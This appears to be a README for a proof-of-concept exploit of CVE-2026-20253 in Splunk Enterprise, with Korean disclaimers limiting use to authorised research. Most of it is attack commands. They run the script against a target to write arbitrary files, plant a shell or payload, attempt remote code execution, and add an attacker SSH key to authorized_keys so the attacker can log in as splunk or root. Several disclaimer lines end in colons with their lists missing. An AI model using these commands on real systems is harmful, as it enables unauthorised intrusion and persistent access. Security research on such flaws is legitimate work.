
CVE-2026-20253 - Splunk Enterprise
이 프로젝트는 다음과 같은 안전하고 승인된 환경에서만 사용하십시오:
예제 설정:
git clone https://github.com/HORKimhab/CVE-2026-20253
cd CVE-2026-20253
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirements
pip install -r requirements.txt
예제 사용법:
# Basic check
python3 cve-2026-20253.py -t http://target:8000 --check
# Write empty/truncated file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/pwned"
# Write with content from file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/shell.py" --content poc-content.txt
# Advanced (restore + content)
python3 cve-2026-20253.py -t http://target:8000 --write "/opt/splunk/etc/apps/.../payload.py" --content poc-content.txt --restore
# RCE attempt
python3 cve-2026-20253.py -t http://target:8000 --rce
python3 cve-2026-20253_poc.py -t http://target:8000 \
--write "/path/to/target/file.py" \
--content poc-content.txt --restore
# SSH
# Generate SSH key pair (if you don't have one)
ssh-keygen -t ed25519 -C "poc@attacker" -f ~/.ssh/splunk_poc_key -N ""
# Or use RSA if target is older
# ssh-keygen -t rsa -b 4096 -f ~/.ssh/splunk_poc_key -N ""
cat ~/.ssh/splunk_poc_key.pub > poc-content.txt
python3 cve-2026-20253_poc.py -t http://target:8000 \
--write "/home/splunk/.ssh/authorized_keys" \
--content poc-content.txt \
--restore
python3 cve-2026-20253_poc.py -t http://target:8000 \
--write "/home/splunk/.ssh/authorized_keys" \
--content poc-content.txt
# Make sure permissions are correct on your side
chmod 600 ~/.ssh/splunk_poc_key
# Connect
ssh -i ~/.ssh/splunk_poc_key splunk@target_ip
# Or as root
ssh -i ~/.ssh/splunk_poc_key root@target_ip
# Step 1: Create directory (may not always work)
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/.placeholder"
# Step 2: Write authorized_keys
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/authorized_keys" --content poc-content.txt
mkdir -p /home/splunk/.ssh
chmod 700 /home/splunk/.ssh
chmod 600 /home/splunk/.ssh/authorized_keys
chown -R splunk:splunk /home/splunk/.ssh
통제된 환경에서 사이버 보안 개념을 학습, 테스트 및 연구하기 위한 저장소입니다.
이 저장소는 교육 및 승인된 보안 연구 전용입니다.
다음에 대해 학습하는 데 도움이 되도록 설계되었습니다:
이 저장소는 다음과 같이 권한이 있는 환경에서만 사용하십시오:
무단 또는 불법 사용은 엄격히 금지됩니다.
저자와 기여자는 이 프로젝트로 인한 손해, 오용, 법적 문제 또는 손실에 대해 책임지지 않습니다.
이 저장소를 사용함으로써 다음에 동의하는 것입니다:
이 프로젝트는 다음을 위해 사용됩니다:
책임 있는 공개 관행을 따르고 모든 관련 법률을 준수하십시오.
책임 있는 공개 또는 협업을 위해 GitHub를 통해 저장소 관리자에게 연락하십시오.